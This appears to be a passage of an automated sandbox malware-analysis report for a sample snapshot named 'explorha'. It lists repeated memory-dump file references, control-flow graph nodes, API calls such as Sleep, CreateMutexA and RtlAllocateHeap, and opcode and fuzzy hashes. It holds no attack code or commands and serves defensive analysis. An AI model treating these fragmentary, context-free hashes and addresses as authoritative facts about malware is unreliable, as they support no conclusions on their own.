                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: bc41a88f9874a081440356afb81a8cd00453c014331b6daa2b32426125a901a6
                                                                                                                                                                                                                                        • Instruction ID: 656e1c2a18f24803582edddae00cad730791eeff73c5298d5c7f0262e4d58d8a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc41a88f9874a081440356afb81a8cd00453c014331b6daa2b32426125a901a6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19212771748304FBF728AB688C9F76DF6E2AF41300F248715E9058A7D2CABD5980C267
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709E1F Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 251 709e1f-709e2b 252 709e41-709e6a call 71ecf8 251->252 253 709e2d-709e3b 251->253 259 709e98-70a3e6 call 719750 252->259 260 709e6c-709e78 252->260 253->252 254 70a40a 253->254 256 70a423-70a466 Sleep CreateMutexA 254->256 257 70a40a call 7382fa 254->257 257->256 261 709e7a-709e88 260->261 262 709e8e-709e95 call 71ecf8 260->262 261->254 261->262 262->259
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 7a460a0c944b9b38f70cdf0bf4f8a37f9b0252445e0af73f5ee6533130b3e85e
                                                                                                                                                                                                                                        • Instruction ID: 683a58b8ca9d0b95357ed8057b91f099e7f67acf42ec0e8caf90e7599c529857
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a460a0c944b9b38f70cdf0bf4f8a37f9b0252445e0af73f5ee6533130b3e85e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E213572704340EBFB08DB6CCC897ADB7A2EB81311F204328E915976D2DBBD59808751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0073EE4F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 304 73ee4f-73ee5a 305 73ee68-73ee6e 304->305 306 73ee5c-73ee66 304->306 307 73ee70-73ee71 305->307 308 73ee87-73ee98 RtlAllocateHeap 305->308 306->305 309 73ee9c-73eea7 call 738ba3 306->309 307->308 310 73ee73-73ee7a call 73b3e2 308->310 311 73ee9a 308->311 314 73eea9-73eeab 309->314 310->309 317 73ee7c-73ee85 call 73a459 310->317 311->314 317->308 317->309
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0073BE33,00000001,00000364,00000006,000000FF,?,0074045F,?,00000004,00000000,?,?), ref: 0073EE90
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 1917b85ad26b8f5994c44ea6b032a2e0ed6901c89d7acbf5eb66515e3237d570
                                                                                                                                                                                                                                        • Instruction ID: 4f98d250052e05ab33ca9de23299569bc76394a886cb2a930421aa084c5d76c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1917b85ad26b8f5994c44ea6b032a2e0ed6901c89d7acbf5eb66515e3237d570
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0E932585234A6FB2126619C05B5B7B989F82760F298111FC08E61C3CF7CEC0041E1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00744330 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Xt$Xt
                                                                                                                                                                                                                                        • API String ID: 0-475810656
                                                                                                                                                                                                                                        • Opcode ID: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction ID: 46d1666ecafddbc1b3e160ed27bdb8499bb4b4570d2edfd9c1c932b231513696
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51F14C71E012199BDF14CFA8D8807AEBBF1FF89314F258269D819AB345D735AE01DB90
